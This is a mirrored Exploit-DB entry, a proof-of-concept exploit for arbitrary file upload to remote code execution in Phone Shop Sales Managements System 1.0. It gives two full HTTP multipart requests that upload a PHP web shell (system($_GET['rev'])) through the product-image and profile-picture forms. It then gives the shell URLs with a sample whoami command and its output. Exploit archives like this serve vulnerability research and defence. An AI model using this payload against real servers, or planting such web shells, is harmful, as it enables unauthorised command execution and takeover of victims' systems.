bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50106.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

161 lines
No EOL
4.4 KiB
Text
Raw Blame History

# Exploit Title: Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution
# Date: 2021-07-06
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
# Version: 1.0
# Tested on: Windows 10, XAMPP
###########
# PoC 1: #
###########
Request:
========
POST /osms/Execute/ExAddProduct.php HTTP/1.1
Host: localhost
Content-Length: 2160
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBZWMUliFtu0otJ0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/osms/AddNewProduct.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=6i2a5u327llvco5kgglbalhdn0
Connection: close
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductName"
camera
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="BrandName"
soskod
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductPrice"
12
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Quantity"
1
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="TotalPrice"
12
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="DisplaySize"
15
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="OperatingSystem"
windows
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Processor"
4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="InternalMemory"
4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="RAM"
4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="CameraDescription"
lens
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="BatteryLife"
3300
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Weight"
500
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Model"
AIG34
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Dimension"
5 inch
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ASIN"
9867638
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductImage"; filename="rev.php"
Content-Type: application/octet-stream
<?php echo "result: ";system($_GET['rev']); ?>
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="date2"
2020-06-03
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Description"
accept
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="_wysihtml5_mode"
1
------WebKitFormBoundaryIBZWMUliFtu0otJ0--
###########
# PoC 2: #
###########
Request:
========
POST /osms/Execute/ExChangePicture.php HTTP/1.1
Host: localhost
Content-Length: 463
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Dm8cGBqGNansHqI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/osms/UserProfile.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=4nksm1jl45bfbbd5ovn0fpi594
Connection: close
------WebKitFormBoundary4Dm8cGBqGNansHqI
Content-Disposition: form-data; name="IDUser"
6
------WebKitFormBoundary4Dm8cGBqGNansHqI
Content-Disposition: form-data; name="Image"; filename="rev.php"
Content-Type: application/octet-stream
<?php echo "output: ";system($_GET['rev']); ?>
------WebKitFormBoundary4Dm8cGBqGNansHqI--
###########
# Access: #
###########
# Webshell access via:
PoC 1: http://localhost/osms/assets/img/Product_Uploaded/rev.php?rev=whoami
PoC 2: http://localhost/osms/assets/img/Profile_Uploaded/rev.php?rev=whoami
# Output:
result: windows10\user
Reference in a new issue View git blame Copy permalink